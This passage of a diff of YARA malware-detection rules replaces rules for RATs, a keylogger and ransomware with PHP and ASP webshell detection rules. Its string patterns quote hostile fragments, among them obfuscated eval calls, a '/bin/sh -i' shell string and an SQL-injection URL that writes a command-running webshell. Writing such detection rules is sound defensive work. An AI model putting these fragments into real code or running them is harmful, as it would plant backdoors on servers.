-		$s1 = "syshost.dll" fullword ascii
-		$s2 = "\\scout\\Release\\scout.pdb" ascii
-		$s3 = "C:\\data.ini" fullword ascii
-		$s4 = "my-ip\" value=\"" fullword ascii
-		$s5 = "ver:%d.%d.%d" fullword ascii
+		$pbs1 = "b374k shell" wide ascii
+		$pbs2 = "b374k/b374k" wide ascii
+		$pbs3 = "\"b374k" wide ascii
+		$pbs4 = "$b374k(\"" wide ascii
+		$pbs5 = "b374k " wide ascii
+		$pbs6 = "0de664ecd2be02cdd54234a0d1229b43" wide ascii
+		$pbs7 = "pwnshell" wide ascii
+		$pbs8 = "reGeorg" fullword wide ascii
+		$pbs9 = "Georg says, 'All seems fine" fullword wide ascii
+		$pbs10 = "My PHP Shell - A very simple web shell" wide ascii
+		$pbs11 = "<title>My PHP Shell <?echo VERSION" wide ascii
+		$pbs12 = "F4ckTeam" fullword wide ascii
+		$pbs15 = "MulCiShell" fullword wide ascii
+		$pbs30 = "bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww" wide ascii
+		$pbs35 = /@\$_GET\s?\[\d\]\)\.@\$_\(\$_GET\s?\[\d\]\)/ wide ascii
+		$pbs36 = /@\$_GET\s?\[\d\]\)\.@\$_\(\$_POST\s?\[\d\]\)/ wide ascii
+		$pbs37 = /@\$_POST\s?\[\d\]\)\.@\$_\(\$_GET\s?\[\d\]\)/ wide ascii
+		$pbs38 = /@\$_POST\[\d\]\)\.@\$_\(\$_POST\[\d\]\)/ wide ascii
+		$pbs39 = /@\$_REQUEST\[\d\]\)\.@\$_\(\$_REQUEST\[\d\]\)/ wide ascii
+		$pbs42 = "array(\"find config.inc.php files\", \"find / -type f -name config.inc.php\")" wide ascii
+		$pbs43 = "$_SERVER[\"\\x48\\x54\\x54\\x50" wide ascii
+		$pbs52 = "preg_replace(\"/[checksql]/e\""
+		$pbs53 = "='http://www.zjjv.com'"
+		$pbs54 = "=\"http://www.zjjv.com\""
+		$pbs60 = /setting\["AccountType"\]\s?=\s?3/
+		$pbs61 = "~+d()\"^\"!{+{}"
+		$pbs62 = "use function \\eval as "
+		$pbs63 = "use function \\assert as "
+		$pbs64 = "eval(`/*" wide ascii
+		$pbs65 = "/* Reverse engineering of this file is strictly prohibited. File protected by copyright law and provided under license. */" wide ascii
+		$pbs66 = "Tas9er" fullword wide ascii
+		$pbs67 = "\"TSOP_\";" fullword wide ascii
+		$pbs68 = "str_rot13('nffreg')" wide ascii
+		$pbs69 = "<?=`{$'" wide ascii
+		$pbs70 = "{'_'.$_}[\"_\"](${'_'.$_}[\"_" wide ascii
+		$pbs71 = "\"e45e329feb5d925b\"" wide ascii
+		$pbs72 = "| PHP FILE MANAGER" wide ascii
+		$pbs73 = "\neval(htmlspecialchars_decode(gzinflate(base64_decode($" wide ascii
+		$pbs74 = "/*\n\nShellindir.org\n\n*/" wide ascii
+		$pbs75 = "$shell = 'uname -a; w; id; /bin/sh -i';" wide ascii
+		$pbs76 = "'password' . '/' . 'id' . '/' . " wide ascii
+		$pbs77 = "= create_function /*" wide ascii
+		$pbs78 = "W3LL M!N! SH3LL" wide ascii
+		$pbs79 = "extract($_REQUEST)&&@$" wide ascii
+		$pbs80 = "\"P-h-p-S-p-y\"" wide ascii
+		$pbs81 = "\\x5f\\x72\\x6f\\x74\\x31\\x33" wide ascii
+		$pbs82 = "\\x62\\x61\\x73\\x65\\x36\\x34\\x5f" wide ascii
+		$pbs83 = "*/base64_decode/*" wide ascii
+		$pbs84 = "\n@eval/*" wide ascii
+		$pbs85 = "*/eval/*" wide ascii
+		$pbs86 = "*/ array /*" wide ascii
+		$pbs87 = "2jtffszJe" wide ascii
+		$pbs88 = "edocne_46esab" wide ascii
+		$pbs89 = "eval($_HEADERS" wide ascii
+		$pbs90 = ">Infinity-Sh3ll<" ascii
+		$front1 = "<?php eval(" nocase wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$dex1 = "dex\n0"
+		$dex2 = "dey\n0"
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "da8475fc7c3c90c0604ce6a0b56b5f21" or 3 of them )
+		filesize < 1000KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not ( uint16( 0 ) == 0x5a4d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( any of ( $pbs* ) or $front1 in ( 0 .. 60 ) )
 }
-rule SIGNATURE_BASE_MAL_Compromised_Cert_Ducktail_Stealer_Jun23 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Strings_SUSP : FILE
 {
 	meta:
-		description = "Detects binaries signed with compromised certificates used by DuckTail stealer - identified in June 2023"
-		author = "dr4k0nia"
-		id = "b491e1b6-42c4-58e9-8efa-19e697804f96"
-		date = "2023-06-16"
-		modified = "2023-08-12"
+		description = "typical webshell strings, suspicious"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "25f25df5-4398-562b-9383-e01ccb17e8de"
+		date = "2021-01-12"
+		modified = "2023-07-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ducktail_compromised_certs_jun23.yar#L2-L37"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9b7916700359d662e99003727f5293f5a937254ff265c3bc8bb8763e196daa0e"
-		score = 80
-		quality = 85
-		tags = "FILE"
-		hash1 = "17c75f2d14af9f00822fc1dba00ccc9ec71fc50962e196d7e6f193f4b2ee0183"
-		hash2 = "b3cfdb442772d07a7f037b0bb093ba315dfd1e79b0e292736c52097355495270"
-		hash3 = "9afe013cae0167993a6a7ccd650eb1221a5ec163110565eb3a49a8b57949d4ee"
-
-	strings:
-		$sx1 = "AZM MARKETING COMPANY LIMITED" ascii fullword
-		$sx2 = "CONG TY TNHH" ascii
-		$sx3 = {43 C3 94 4E 47 20 54 59 20 54 4E 48 48 20}
-		$sx4 = "CONG TY TRACH" ascii
-		$se1 = {65 78 BE 85 2D 48 E3 3D 4E 48 B8 D4 73 F5 B7 60}
-		$se2 = {1D 53 38 32 74 2B 58 37 87 C0 A2 53 32 F7 FB 06}
-		$se3 = {00 BD 7B 85 B2 6A 69 C9 7D 6D 68 CC 95 67 34 C0 6B}
-		$se4 = {06 5F 5C 57 0B D6 A7 98 92 FB B0 E6 34 61 3A 4D}
-		$se5 = {41 55 3F 07 13 37 11 7A 99 B4 58 57}
-		$se6 = {1E AA E4 CE E7 EE 89 FB 20 32 59 27 88 13 D8 53}
-		$se7 = {56 DC DB 85 D4 89 F9 87 B2 D6 76 72}
-		$se8 = {2D A4 50 57 C2 74 3C 1A 3C A4 93 7A}
-		$se9 = {37 AE 95 F5 4C 8E 9B D0 B6 47 68 6A}
-		$se10 = {3D C8 F5 3B 62 7A 34 07 AC 7E 01 00 13 87 A3 B3}
-		$se11 = {01 C9 87 5A 5F A8 59 68 6D 34 17 C9}
-		$se12 = {1B 35 19 E1 CD C2 6B 57 DA EE 06 C9}
-		$se13 = {79 7D 0B 5E 22 AA 0F C7 A2 97 E6 48}
-		$se14 = {57 9E 5C 89 B0 85 A7 96 B3 3C F3 19}
-
-	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $sx* ) and 1 of ( $se* )
-}
-rule SIGNATURE_BASE_SUSP_Certificate_Payload : FILE
-{
-	meta:
-		description = "Detects payloads that pretend to be certificates"
-		author = "Didier Stevens, Florian Roth"
-		id = "6f1fe410-591a-5a59-a683-67cad9777dfe"
-		date = "2018-08-02"
-		modified = "2023-12-05"
-		reference = "https://blog.nviso.be/2018/08/02/powershell-inside-a-certificate-part-3/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cert_payloads.yar#L1-L22"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2671-L2757"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "909cf4209bbb876a042d86e017f65ce3764d2fde7a602406ed8531ba97c9fb9b"
+		hash = "0dd568dbe946b5aa4e1d33eab1decbd71903ea04"
+		hash = "dde2bdcde95730510b22ae8d52e4344997cb1e74"
+		hash = "499db4d70955f7d40cf5cbaf2ecaf7a2"
+		hash = "281b66f62db5caab2a6eb08929575ad95628a690"
+		hash = "1ab3ae4d613b120f9681f6aa8933d66fa38e4886"
+		logic_hash = "5c3837ab761ee2209fab5fc333b050a56d80addb03b088ae28040c7393429bb3"
 		score = 50
-		quality = 85
+		quality = 40
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$re1 = "-----BEGIN CERTIFICATE-----"
-		$fp1 = "replace it with the PEM-encoded root certificate"
+		$sstring1 = "eval(\"?>\"" nocase wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$inp1 = "php://input" wide ascii
+		$inp2 = /_GET\s?\[/ wide ascii
+		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
+		$inp4 = /_POST\s?\[/ wide ascii
+		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
+		$inp6 = /_REQUEST\s?\[/ wide ascii
+		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
+		$inp15 = "_SERVER['HTTP_" wide ascii
+		$inp16 = "_SERVER[\"HTTP_" wide ascii
+		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
+		$inp18 = "array_values($_SERVER)" wide ascii
+		$inp19 = /file_get_contents\("https?:\/\// wide ascii
 
 	condition:
-		uint32( 0 ) == 0x2D2D2D2D and $re1 at 0 and not uint8( 29 ) == 0x4D and not uint8( 28 ) == 0x4D and not 1 of ( $fp* )
+		filesize < 700KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not ( any of ( $gfp* ) ) and ( 1 of ( $sstring* ) and ( any of ( $inp* ) ) )
 }
-rule SIGNATURE_BASE_Quasar_RAT_Jan18_1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_In_Htaccess : FILE
 {
 	meta:
-		description = "Detects Quasar RAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "52408897-bfec-5726-9d01-6ff982d50c28"
-		date = "2018-01-29"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_quasar_vermin.yar#L11-L33"
+		description = "Use Apache .htaccess to execute php code inside .htaccess"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0f5edff9-22b2-50c9-ae81-72698ea8e7db"
+		date = "2021-01-07"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2759-L2781"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4b2c8695a053a714e97f3e108f0f359d9e49151297a21e460b3201d8f4e72a89"
+		hash = "c026d4512a32d93899d486c6f11d1e13b058a713"
+		hash = "d79e9b13a32a9e9f3fa36aa1a4baf444bfd2599a"
+		hash = "e1d1091fee6026829e037b2c70c228344955c263"
+		hash = "c026d4512a32d93899d486c6f11d1e13b058a713"
+		hash = "8c9e65cd3ef093cd9c5b418dc5116845aa6602bc92b9b5991b27344d8b3f7ef2"
+		logic_hash = "0652a4cb0cb6c61afece5c2e4cbf2f281714509f0d828047f2e3ccd411602115"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6"
-		hash2 = "24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18"
+		importance = 70
 
 	strings:
-		$a1 = "ping -n 20 localhost > nul" fullword wide
-		$s2 = "HandleDownloadAndExecuteCommand" fullword ascii
-		$s3 = "DownloadAndExecute" fullword ascii
-		$s4 = "UploadAndExecute" fullword ascii
-		$s5 = "ShellCommandResponse" fullword ascii
-		$s6 = "Select * From Win32_ComputerSystem" fullword wide
-		$s7 = "Process could not be started!" fullword wide
-		$s8 = ".Core.RemoteShell" ascii
+		$hta = "AddType application/x-httpd-php .htaccess" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and $a1 and 3 of them
+		filesize < 100KB and $hta
 }
-rule SIGNATURE_BASE_Vermin_Keylogger_Jan18_1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Function_Via_Get : FILE
 {
 	meta:
-		description = "Detects Vermin Keylogger"
-		author = "Florian Roth (Nextron Systems)"
-		id = "52192ea1-bb3d-52da-ba18-0645262745e2"
-		date = "2018-01-29"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_quasar_vermin.yar#L35-L71"
+		description = "Webshell which sends eval/assert via GET"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5fef1063-2f9f-516e-86f6-cfd98bb05e6e"
+		date = "2021-01-09"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2783-L2827"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a8afe017f32400e1e498d23746f5cb59c3c67f6abefe9b2e36bec81ca82ecfed"
+		hash = "ce739d65c31b3c7ea94357a38f7bd0dc264da052d4fd93a1eabb257f6e3a97a6"
+		hash = "d870e971511ea3e082662f8e6ec22e8a8443ca79"
+		hash = "73fa97372b3bb829835270a5e20259163ecc3fdbf73ef2a99cb80709ea4572be"
+		logic_hash = "309203db8e7374531d359e3a723418d47bead45034c4a7bd726fb714622dc039"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d"
-		hash2 = "e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7"
-		hash3 = "0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6"
-		hash4 = "4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da"
-		hash5 = "24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18"
-		hash6 = "2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef"
+		importance = 70
 
 	strings:
-		$x1 = "_keyloggerTaskDescription" ascii
-		$x2 = "_keyloggerTaskAuthor" ascii
-		$x3 = "GetKeyloggerLogsResponse" fullword ascii
-		$x4 = "GetKeyloggerLogs" fullword ascii
-		$x5 = "ExecuteUninstallKeyLoggerTask" fullword ascii
-		$x6 = "ExecuteInstallKeyLoggerTask" fullword ascii
-		$x7 = ":\\Projects\\Vermin\\KeyboardHookLib\\" ascii
-		$x8 = ":\\Projects\\Vermin\\CryptoLib\\" ascii
-		$s1 = "<RunHidden>k__BackingField" fullword ascii
-		$s2 = "set_SystemInfos" fullword ascii
-		$s3 = "set_RunHidden" fullword ascii
-		$s4 = "set_RemotePath" fullword ascii
-		$s5 = "ExecuteShellCommandTask" fullword ascii
-		$s6 = "Client.exe" fullword wide
-		$s7 = "xClient.Core.ReverseProxy.Packets" fullword ascii
+		$sr0 = /\$_GET\s?\[.{1,30}\]\(\$_GET\s?\[/ wide ascii
+		$sr1 = /\$_POST\s?\[.{1,30}\]\(\$_GET\s?\[/ wide ascii
+		$sr2 = /\$_POST\s?\[.{1,30}\]\(\$_POST\s?\[/ wide ascii
+		$sr3 = /\$_GET\s?\[.{1,30}\]\(\$_POST\s?\[/ wide ascii
+		$sr4 = /\$_REQUEST\s?\[.{1,30}\]\(\$_REQUEST\s?\[/ wide ascii
+		$sr5 = /\$_SERVER\s?\[HTTP_.{1,30}\]\(\$_SERVER\s?\[HTTP_/ wide ascii
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 1 of ( $x* ) or 3 of them )
+		filesize < 500KB and not ( any of ( $gfp* ) ) and any of ( $sr* )
 }
-rule SIGNATURE_BASE_Apt_Backspace : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Writer : FILE
 {
 	meta:
-		description = "Detects APT backspace"
-		author = "Bit Byte Bitten"
-		id = "3da3337d-b6d3-5661-b43e-535e06817303"
-		date = "2015-05-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_backspace.yar#L6-L19"
+		description = "PHP webshell which only writes an uploaded file to disk"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "05bb3e0c-69b2-5176-a3eb-e6ba2d72a205"
+		date = "2021-04-17"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2829-L2919"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6cbfeb7526de65eb2e3c848acac05da1e885636d17c1c45c62ad37e44cd84f99"
-		logic_hash = "6fa86ada5c965bd9c199c2a1cf9b691499a3d423da7db50c8987b6725c0c0f29"
-		score = 75
-		quality = 85
+		hash = "ec83d69512aa0cc85584973f5f0850932fb1949fb5fb2b7e6e5bbfb121193637"
+		hash = "407c15f94a33232c64ddf45f194917fabcd2e83cf93f38ee82f9720e2635fa64"
+		hash = "988b125b6727b94ce9a27ea42edc0ce282c5dfeb"
+		hash = "0ce760131787803bbef216d0ee9b5eb062633537"
+		hash = "20281d16838f707c86b1ff1428a293ed6aec0e97"
+		logic_hash = "34bae0c02156d1c9fd24d674443322409eba0a43e094fc6c05df94bbbe15aa64"
+		score = 50
+		quality = 42
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s1 = "!! Use Splice Socket !!"
-		$s2 = "User-Agent: SJZJ (compatible; MSIE 6.0; Win32)"
-		$s3 = "g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d"
+		$sus3 = "'upload'" wide ascii
+		$sus4 = "\"upload\"" wide ascii
+		$sus5 = "\"Upload\"" wide ascii
+		$sus6 = "gif89" wide ascii
+		$sus16 = "Army" fullword wide ascii
+		$sus17 = "error_reporting( 0 )" wide ascii
+		$sus18 = "' . '" wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$inp1 = "php://input" wide ascii
+		$inp2 = /_GET\s?\[/ wide ascii
+		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
+		$inp4 = /_POST\s?\[/ wide ascii
+		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
+		$inp6 = /_REQUEST\s?\[/ wide ascii
+		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
+		$inp15 = "_SERVER['HTTP_" wide ascii
+		$inp16 = "_SERVER[\"HTTP_" wide ascii
+		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
+		$inp18 = "array_values($_SERVER)" wide ascii
+		$inp19 = /file_get_contents\("https?:\/\// wide ascii
+		$php_multi_write1 = "fopen(" wide ascii
+		$php_multi_write2 = "fwrite(" wide ascii
+		$php_write1 = "move_uploaded_file" fullword wide ascii
+		$php_write2 = "copy" fullword wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		(( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $inp* ) ) and ( any of ( $php_write* ) or all of ( $php_multi_write* ) ) and ( filesize < 400 or ( filesize < 4000 and 1 of ( $sus* ) ) )
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Darkside_May21_1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Writer : FILE
 {
 	meta:
-		description = "Detects Darkside Ransomware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5592065-591e-597b-bebb-f20bc306fe52"
-		date = "2021-05-10"
-		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/020c1740-717a-4191-8917-5819aa25f385/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_darkside.yar#L2-L23"
+		description = "ASP webshell which only writes an uploaded file to disk"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a1310e22-f485-5f06-8f1a-4cf9ae8413a1"
+		date = "2021-03-07"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2921-L3091"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "84de92b0b36e373aa61e314a04597bd0578a04af34c501ae9071e5f4fa27c07a"
-		score = 75
-		quality = 85
+		hash = "df6eaba8d643c49c6f38016531c88332e80af33c"
+		hash = "83642a926291a499916e8c915dacadd0d5a8b91f"
+		hash = "5417fad68a6f7320d227f558bf64657fe3aa9153"
+		hash = "97d9f6c411f54b56056a145654cd00abca2ff871"
+		hash = "fc44fd7475ee6c0758ace2b17dd41ed7ea75cc73"
+		logic_hash = "7c9f4c9a5005efad02760cf9ba3ea946068ae281cda10215bf8c88f209b582a5"
+		score = 60
+		quality = -75
 		tags = "FILE"
-		hash1 = "ec368752c2cf3b23efbfa5705f9e582fc9d6766435a7b8eea8ef045082c6fbce"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$op1 = { 85 c9 75 ed ff 75 10 ff b5 d8 fe ff ff ff b5 dc fe ff ff e8 7d fc ff ff ff 8d cc fe ff ff 8b 8d cc fe ff ff }
-		$op2 = { 66 0f 6f 06 66 0f 7f 07 83 c6 10 83 c7 10 49 85 c9 75 ed 5f }
-		$op3 = { 6a 00 ff 15 72 0d 41 00 ab 46 81 fe 80 00 00 00 75 2e 6a ff 6a 01 }
-		$op4 = { 0f b7 0c 5d 88 0f 41 00 03 4c 24 04 89 4c 24 04 83 e1 3f 0f b7 14 4d 88 0f 41 00 03 54 24 08 89 54 24 08 83 e2 3f }
-		$s1 = "http://darksid" ascii
-		$s2 = "[ Welcome to DarkSide ]" ascii
-		$s3 = ".onion/" ascii
+		$sus1 = "password" fullword wide ascii
+		$sus2 = "pwd" fullword wide ascii
+		$sus3 = "<asp:TextBox" fullword nocase wide ascii
+		$sus4 = "\"upload\"" wide ascii
+		$sus5 = "\"Upload\"" wide ascii
+		$sus6 = "gif89" wide ascii
+		$sus7 = "\"&\"" wide ascii
+		$sus8 = "authkey" fullword wide ascii
+		$sus9 = "AUTHKEY" fullword wide ascii
+		$sus10 = "test.asp" fullword wide ascii
+		$sus11 = "cmd.asp" fullword wide ascii
+		$sus12 = ".Write(Request." wide ascii
+		$sus13 = "<textarea " wide ascii
+		$sus14 = "\"unsafe" fullword wide ascii
+		$sus15 = "'unsafe" fullword wide ascii
+		$sus16 = "Army" fullword wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
